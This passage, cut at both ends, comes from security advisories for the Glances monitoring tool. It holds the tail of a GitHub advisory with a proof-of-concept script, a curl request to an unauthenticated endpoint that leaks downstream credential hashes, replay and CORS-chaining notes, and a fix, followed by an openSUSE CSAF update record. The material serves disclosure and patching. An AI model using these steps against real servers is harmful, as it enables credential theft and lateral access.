\u0027defaultpassword\u0027\n def get_hash(self, password):\n return f\u0027hash({password})\u0027\n\nsl = GlancesServersList.__new__(GlancesServersList)\nsl.password = FakePassword()\nsl._columns = [{\u0027plugin\u0027: \u0027system\u0027, \u0027field\u0027: \u0027hr_name\u0027}]\nserver = {\n \u0027key\u0027: f\u0027target:{port}\u0027,\n \u0027name\u0027: \u0027127.0.0.1\u0027,\n \u0027ip\u0027: \u0027203.0.113.77\u0027,\n \u0027port\u0027: port,\n \u0027protocol\u0027: \u0027rpc\u0027,\n \u0027username\u0027: \u0027glances\u0027,\n \u0027password\u0027: \u0027\u0027,\n \u0027status\u0027: \u0027UNKNOWN\u0027,\n \u0027type\u0027: \u0027STATIC\u0027,\n}\nsl.get_servers_list = lambda: [server]\n\nsl._GlancesServersList__update_stats(server)\nsl._GlancesServersList__update_stats(server)\nhttpd.shutdown()\nthread.join(timeout=2)\nprint(json.dumps(sl.get_servers_list(), indent=2))\n\u0027@ | python -\n```\n\nVerified output:\n\n```json\n[\n {\n \"key\": \"target:57390\",\n \"name\": \"127.0.0.1\",\n \"ip\": \"203.0.113.77\",\n \"port\": 57390,\n \"protocol\": \"rpc\",\n \"username\": \"glances\",\n \"password\": null,\n \"status\": \"PROTECTED\",\n \"type\": \"STATIC\",\n \"uri\": \"http://glances:hash(defaultpassword)@127.0.0.1:57390\",\n \"columns\": [\n \"system_hr_name\"\n ]\n }\n]\n```\n\nThis is the same raw object shape that `/api/4/serverslist` returns.\n\n### Step 2: Remote reproduction on a live Browser instance\n\n1. Configure Glances Browser mode with a saved default password for downstream servers:\n\n```ini\n[passwords]\ndefault=SuperSecretBrowserPassword\n```\n\n2. Start the Browser/API instance without front-end authentication:\n\n```bash\nglances --browser -w -C ./glances.conf\n```\n\n3. Ensure at least one protected downstream server is polled and marked `PROTECTED`.\n\n4. From any machine that can reach the Glances Browser API, fetch the raw server list:\n\n```bash\ncurl -s http://TARGET:61208/api/4/serverslist\n```\n\n5. Observe entries like:\n\n```json\n{\n \"name\": \"internal-glances.example\",\n \"status\": \"PROTECTED\",\n \"uri\": \"http://glances:\u003cpbkdf2_hash\u003e@internal-glances.example:61209\"\n}\n```\n\n## Impact\n\n- **Unauthenticated credential disclosure:** When the front Browser API runs without `--password`, any reachable user can retrieve downstream Glances authentication secrets from `/api/4/serverslist`.\n- **Credential replay:** The disclosed pbkdf2-derived hash is the effective Glances client secret and can be replayed against downstream Glances servers using the same password.\n- **Fleet-wide blast radius:** A single Browser instance can hold passwords for many downstream servers via host-specific entries or `[passwords] default`, so one exposed API can disclose credentials for an entire monitored fleet.\n- **Chains with the earlier CORS issue:** Even when the front instance uses `--password`, the permissive default CORS behavior can let a malicious website read `/api/4/serverslist` from an authenticated browser session and steal the same downstream credentials cross-origin.\n\n## Recommended Fix\n\nDo not expose credential-bearing fields in API responses. At minimum, strip `uri`, `password`, and any derived credential material from `/api/4/serverslist` responses and make the frontend derive navigation targets without embedded auth.\n\n```python\n# glances/outputs/glances_restful_api.py\n\ndef _sanitize_server(self, server):\n safe = dict(server)\n safe.pop(\u0027password\u0027, None)\n safe.pop(\u0027uri\u0027, None)\n return safe\n\ndef _api_servers_list(self):\n self.__update_servers_list()\n servers = self.servers_list.get_servers_list() if self.servers_list else []\n return GlancesJSONResponse([self._sanitize_server(server) for server in servers])\n```\n\nAnd in the Browser WebUI, construct navigation URLs from non-secret fields (`ip`, `name`, `port`, `protocol`) instead of trusting a backend-supplied `server.uri`.",
"id": "GHSA-r297-p3v4-wp8m",
"modified": "2026-03-18T21:48:47Z",
"published": "2026-03-16T16:35:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32633"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Glances\u0027s Browser API Exposes Reusable Downstream Credentials via `/api/4/serverslist`"
}
OPENSUSE-SU-2026:10415-1
Vulnerability from csaf_opensuse - Published: 2026-03-24 00:00 - Updated: 2026-03-24 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.2-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.2-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10415",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10415-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32596 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32596/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32609 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32609/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32610 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32610/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32632 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32632/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32633 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32633/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32634 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32634/"
}
],
"title": "glances-common-4.5.2-1.1 on GA media",
"tracking": {
"current_release_date": "2026-03-24T00:00:00Z",
"generator": {
"date": "2026-03-24T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10415-1",
"initial_release_date": "2026-03-24T00:00:00Z",
"revision_history": [
{
"date": "2026-03-24T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.aarch64",
"product": {
"name": "glances-common-4.5.2-1.1.aarch64",
"product_id": "glances-common-4.5.2-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.2-1.1.aarch64",
"product_id": "python311-Glances-4.5.2-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.2-1.1.aarch64",
"product_id": "python313-Glances-4.5.2-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.2-1.1.ppc64le",
"product_id": "glances-common-4.5.2-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.2-1.1.ppc64le",
"product_id": "python311-Glances-4.5.2-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.2-1.1.ppc64le",
"product_id": "python313-Glances-4.5.2-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.s390x",
"product": {
"name": "glances-common-4.5.2-1.1.s390x",
"product_id": "glances-common-4.5.2-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.2-1.1.s390x",
"product_id": "python311-Glances-4.5.2-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.2-1.1.s390x",
"product_id": "python313-Glances-4.5.2-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.x86_64",
"product": {
"name": "glances-common-4.5.2-1.1.x86_64",
"product_id": "glances-common-4.5.2-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.2-1.1.x86_64",
"product_id": "python311-Glances-4.5.2-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.2-1.1.x86_64",
"product_id": "python313-Glances-4.5.2-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64"
},
"product_reference": "glances-common-4.5.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x"
},
"product_reference": "glances-common-4.5.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64"
},
"product_reference": "glances-common-4.5.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-32596",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32596"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.2, Glances web server runs without authentication by default when started with `glances -w`, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32596",
"url": "https://www.suse.com/security/cve/CVE-2026-32596"
},
{
"category": "external",
"summary": "SUSE Bug 1260321 for CVE-2026-32596",
"url": "https://bugzilla.suse.com/1260321"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
